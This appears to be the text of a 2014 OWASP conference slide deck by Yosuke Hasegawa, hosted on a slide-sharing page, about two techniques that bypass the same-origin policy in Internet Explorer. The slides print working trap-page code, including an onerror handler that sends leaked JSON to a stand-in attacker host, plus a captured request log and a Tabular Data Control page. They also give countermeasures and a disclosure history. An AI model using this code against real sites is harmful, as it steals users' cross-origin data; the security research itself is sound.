Bypass SOP, Theft your data

>100 Views

March 19, 14

#security #owaspjapan #Cross-Origin Information Disclosure #VBScript Error Message #Tabular Data Control #Data Security #Yosuke HASEGAWA

スライド概要

OWASP AppSec APAC 2014

はせがわようすけ

@hasegawa

スライド一覧

https://utf-8.jp/

またはPlayer版

埋め込む »CMSなどでJSが使えない場合

ダウンロード

ダウンロード(pdf - 0.92MB)

関連スライド

CVSSとその限界

security 脆弱性

はせがわようすけ 78.2K

「脆弱性」「脅威」「リスク」の再整理

security 脅威モデリング

はせがわようすけ 34K

セキュリティにおける倫理って何だ？

security

はせがわようすけ 28.5K

Node.jsの色々

owaspsendai nodejs security javascript

はせがわようすけ 21.6K

JavaScript難読化読経

security javascript seccamp obfuscation

はせがわようすけ 16.4K

CSPを無意味にする残念なServiceWorker

security shibuyaxss javascript xss

はせがわようすけ 11.2K

各ページのテキスト

Bypass SOP, Theft your data - XSS Allstars from Japan - Yosuke HASEGAWA

About Me Yosuke HASEGAWA @hasegawayosuke Engineer of NetAgent Co.,Ltd. Secure Sky Technology Inc. technical adviser http://utf-8.jp/ author of jjencode, aaencode, ... OWASP Kansai Chapter Leader OWASP Japan Chapter Advisory Board member

http://utf-8.jp/

Agenda Cross-Origin information disclosure Not XSS, but bypass SOP Introduce 2 ways for modern IE VBScript Error msg Tabular Data Control

VBScript Error message

VBScript Error Msg VBScript Error Msg Target: IE9-10 (IE6-8 are safe, wow!) Reading JSON Array as VBScript on trap page created by attacker VBScript raises exception with error message including JSON content JavaScript can access to JSON content via error message

[beta]

VBScript Error Msg

Reading JSON as VBScript src
fail → raises exception
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
[ "secret", "data", "is", "here" ]

// Trap page by attacker
<script
src="http://example.jp/target.json"
language="vbscript">
</script>

[beta]

VBScript Error Msg

catch error msg with error handler
<script>
window.onerror = function( e ){
document.getElementById( "img" ).setAttribute(
"src", "http://attacker.utf-8.jp/log?" + e );
}
</script>
<script src="http://example.jp/target.json"
language="vbscript"></script>

GET http://attacker.utf-8.jp/log?Type%20mismatch:%20'
%20"secret",%20"message",%20"is",%20"here"%20' HTTP/1.1
Referer: http://attacker.utf-8.jp/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT
6.1; WOW64; Trident/6.0)

Countermeasure Countermeasure add "X-Content-Type-Options:nosniff" HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 X-Content-Type-Options: nosniff [ "secret", "data", "is", "here" ]

VBScript Error Msg supplementary supplementary Dec 2012: reported to MS by me and @masa141421356 May 2013: Fixed with MS13-037 only for IE6-8. IE9-10 was not. "Add X-C-T-O header for IE9-11 to prevent from this attack, this is BEHAVIOR BY DESIGIN" they said.

10.

Tabular Data Control

11.

[beta]

Tabular Data Control

Tabular Data Control - TDC
ActiveX Control for binding text file into
HTML as data table
http://msdn.microsoft.com/en-us/library/ms531356.aspx

Enabled by default on IE6-IE11, with
older doc-mode

<meta http-equiv="x-ua-compatible" content="IE=10">

Spotlighted by Cure53 X-Mas Challenge
https://cure53.de/xmas2013/
https://cure53.de/xmas2013/writeup
The winner is @kinugawamasato

12.

[beta]

Tabular Data Control
//target page included secret data on example.jp/target.txt
Content-Type: application/octet-stream
Content-Disposition: attachment; filename=bindata
X-Content-Type-Options: nosnifｆ
@!allow_domains=attacker.utf-8.jp
secret,data,is,here
// Trap page by attacker on attacker.utf-8.jp
function show(){
var s = document.getElementById("tdc")
.recordset.getString();
alert( s );
}
...
<meta http-equiv="x-ua-compatible" content="IE=10" >
<object id="tdc" ondatasetcomplete="show()"
classid="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83">
<param name="DataURL" value="http://example.jp/target.txt">
</object>

http://example.jp/target.txt

13.

Tabular Data Control Attacker has to insert "@!allow_domains=..." into the top of target text Once inserted, no way to prevent from theft Unhelpful: X-Content-Type-Options: nosniff Content-Disposition: attachment

14.

Countermeasure Countermeasure Restrict access to XHR request with custom X header var xhr = new XMLHttpRequest(); xhr.open( "GET", "http://example.jp/target.txt", true ); xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest"); xhr.send( null ); GET /target.json HTTP/1.1 Host: example.jp User-Agent: Mozilla/5.0… Accept: */* X-Requested-With: XMLHttpRequest and / or...

15.

[beta]

Countermeasure(cont.)

Countermeasure (cont.)
Don't allow to place text by attacker
into top of the content
//target page included secret data on example.jp/target.txt
Content-Type: application/octet-stream
Content-Disposition: attachment; filename=bindata
X-Content-Type-Options: nosniff
@!allow_domains=attacker.utf-8.jp
secret,data,is,here

16.

Conclusion

17.

Conclusion Conclusion IE has funny behavior even now Add X-Content-Type-Options for all resources Restrict access to XHR with custom X- header

18.

Question ? Question ? [email protected] @hasegawayosuke http://utf-8.jp/

http://utf-8.jp/